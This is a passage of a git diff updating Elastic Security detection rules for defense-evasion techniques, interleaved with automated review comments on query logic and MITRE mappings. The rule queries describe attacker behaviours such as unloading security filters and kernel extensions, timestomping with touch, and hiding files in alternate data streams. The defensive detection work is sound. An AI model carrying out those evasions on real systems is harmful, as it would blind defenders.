This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json index 4b1f13a10414d..98cb6c6db886c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json 
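Review bot: The new triage note describes the rule as looking for "the creation of executable files", but the query is `file where event.type != "deletion"`, which also matches modification, rename and any other non-deletion file event type. Either the note should say "creation or modification", or the query should use `event.type == "creation"` to match the documented intent; as written an analyst following the note will expect a narrower alert than the rule produces. It is also worth adding a query comment that `process.name : ("smss.exe", ...)` is a name-only match with no path or signature check, which is why the note's "expected locations" and "valid digital signatures" steps are the first thing to verify.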
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json @@ -15,6 +15,28 @@ "references": [ "https://theevilbit.github.io/posts/cve_2020_9771/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b00bcd89-000c-4425-b94c-716ef67762f6", "severity": "high", @@ -23,7 +45,8 @@ "Host", "macOS", "Threat Detection", - "Defense Evasion" + "Defense Evasion", + "CVE_2020_9771" ], "threat": [ { @@ -44,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json index 7e507dc83e38c..cd4e11502cf6d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json 
@@ -12,10 +12,33 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Timestomping using Touch Command", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name : \"touch\" and user.id != \"0\" and\n process.args : (\"-r\", \"-t\", \"-a*\",\"-m*\") and\n not process.args : (\"/usr/lib/go-*/bin/go\", \"/usr/lib/dracut/dracut-functions.sh\", \"/tmp/KSInstallAction.*/m/.patch/*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json index aadcaadaba980..cdc517554ec4c 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Attempt to Unload Elastic Endpoint Security Kernel Extension", "query": "event.category:process and event.type:(start or process_started) and\n process.name:kextunload and process.args:(\"/System/Library/Extensions/EndpointSecurity.kext\" or \"EndpointSecurity.kext\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24", "severity": "high", @@ -44,9 +66,31 @@ ] } ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json index 67c2d2fdca43a..f5c6baed30ae3 100644 
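Review bot: The added MITRE mapping to T1547.006 (Kernel Modules and Extensions, under Persistence) is an odd fit for a rule whose query only fires on `process.name:kextunload`: unloading a security kext removes a defense rather than establishing an autostart. If the rationale is that the actor subsequently loads their own extension, that is not what this query matches, so the mapping overstates what an alert tells the analyst; T1562.001 (Impair Defenses: Disable or Modify Tools) describes the matched behavior, unless the first `threat` entry, which is outside this hunk, already covers it. If the Persistence mapping is intentional, a sentence in the commit message explaining it would help.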
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type == \"creation\" and\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
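Review bot: `"png"` appears twice in the `file.extension` list in the query; one of the entries should be dropped. The path pattern `file.path : "C:\\*:*"` also covers only the C: drive, whereas the sibling rules in this diff use `?:` for the drive letter, so alternate data stream creation on any other volume is missed; `file.path : "?:\\*:*"` together with `not file.path : "?:\\*:zone.identifier*"` would be consistent with the rest of the set and close that gap.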
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json index 2c570f9e66eb4..e072806036142 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Process Execution Path - Alternate Data Stream", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json index 1b6b500d42413..cec08714d8215 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json @@ -18,6 +18,38 @@ "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c7894234-7814-44c2-92a9-f7d851ea246a", "severity": "medium", @@ -39,12 +71,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json index f37b6a21c7e58..4fc6dc855d7e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json 
@@ -12,9 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Connection via RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Connection via RunDLL32\n\nRunDLL32 is a built-in Windows utility and also a vital component used by the operating system itself. The functionality\nprovided by RunDLL32 to execute Dynamic Link Libraries (DLLs) is widely abused by attackers, because it makes it hard to\ndifferentiate malicious activity from normal operations.\n\nThis rule looks for external network connections established using RunDLL32 when the utility is being executed with no\narguments, which can potentially indicate command and control activity.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that RunDLL32 is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Identify the target computer and its role in the IT environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"rundll32.exe\" and process.args_count == 1]\n [network where process.name : \"rundll32.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://redcanary.com/threat-detection-report/techniques/rundll32/" + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "52aaab7b-b51c-441a-89ce-4387b3aea886", @@ -37,7 +71,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -51,5 +85,5 @@ } ], "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json index a882a3d57f750..f3c6830788d7c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json 
@@ -12,7 +12,25 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Process Network Connection", + "note": "## Triage and analysis\n\n### Investigating Unusual Process Network Connection\n\nThis rule identifies network activity from unexpected system utilities and applications. These applications are commonly\nabused by attackers to execute code, evade detections, and bypass security protections.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that the process is communicating with.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\") and\n event.type == \"start\"]\n [network where (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "610949a1-312f-4e04-bb55-3a79b8c95267", "severity": "low", @@ -41,5 +59,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } 
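Review bot: The new `note` presents the rule as flagging network activity from unexpected utilities, but does not say that, unlike the RunDLL32 rule updated in this commit, the query applies no `cidrmatch` exclusion for private or reserved destinations, so connections to internal hosts alert as well. A line under the investigation steps would help triage, e.g. `- This rule does not exclude internal destinations; establish whether the target is an internal host before escalating.` The `query` line itself is unchanged context in this hunk.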
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json
index eaff79d12b68d..f07c2b675556e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Child Process from a System Virtual Process",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.pid == 4 and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.pid",
+ "type": "long"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
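Review bot: The `## Config` text moves into the new `setup` field, but `note` is then written as the empty string `""` rather than dropped, and the same pattern appears in the Filter Manager, AWS WAF Access Control List Deletion and AWS WAF Rule or Rule Group Deletion hunks below. Downstream readers of these files must then treat `""` and an absent key alike, which is easy to get wrong when deciding whether an investigation guide exists. If the files are produced by an exporter, that is the place to omit the key when no guide remains; it is not visible here whether the rule schema requires `note` to be present, so if it does, keeping the empty string is defensible and worth a comment in the exporter.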
@@ -43,5 +61,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json
index 8457e79426754..7d923566c8a40 100755
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Evasion via Filter Manager",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and \n process.name : \"fltMC.exe\" and process.args : \"unload\"\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -50,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 9
+ "version": 11
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json
index 1b959097e30c9..c5605bc79ab2a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json
@@ -15,14 +15,39 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS WAF Access Control List Deletion",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.action:DeleteWebACL and event.outcome:success\n",
 "references": [
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/waf-regional/delete-web-acl.html",
 "https://docs.aws.amazon.com/waf/latest/APIReference/API_wafRegional_DeleteWebACL.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "91d04cd4-47a9-4334-ab14-084abe274d49",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -58,5 +83,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json
index e23fb0c2d9829..f1b5d5747cf1e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json
@@ -15,14 +15,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS WAF Rule or Rule Group Deletion",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:(waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) and event.action:(DeleteRule or DeleteRuleGroup) and event.outcome:success\n",
 "references": [
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/waf/delete-rule-group.html",
 "https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRuleGroup.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "5beaebc1-cc13-4bfc-9949-776f9e0dc318",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -58,5 +88,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 8
+ "version": 10
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json
deleted file mode 100644
index 177644038b3cc..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json
+++ /dev/null
@@ -1,44 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Identifies process execution events where the command line value contains a long sequence of whitespace characters or multiple occurrences of contiguous whitespace. Attackers may attempt to evade signature-based detections by padding their malicious command with unnecessary whitespace characters. These observations should be investigated for malicious behavior.",
- "from": "now-9m",
- "index": [
- "winlogbeat-*",
- "logs-endpoint.events.*",
- "logs-windows.*"
- ],
- "language": "eql",
- "license": "Elastic License v2",
- "name": "Whitespace Padding in Process Command Line",
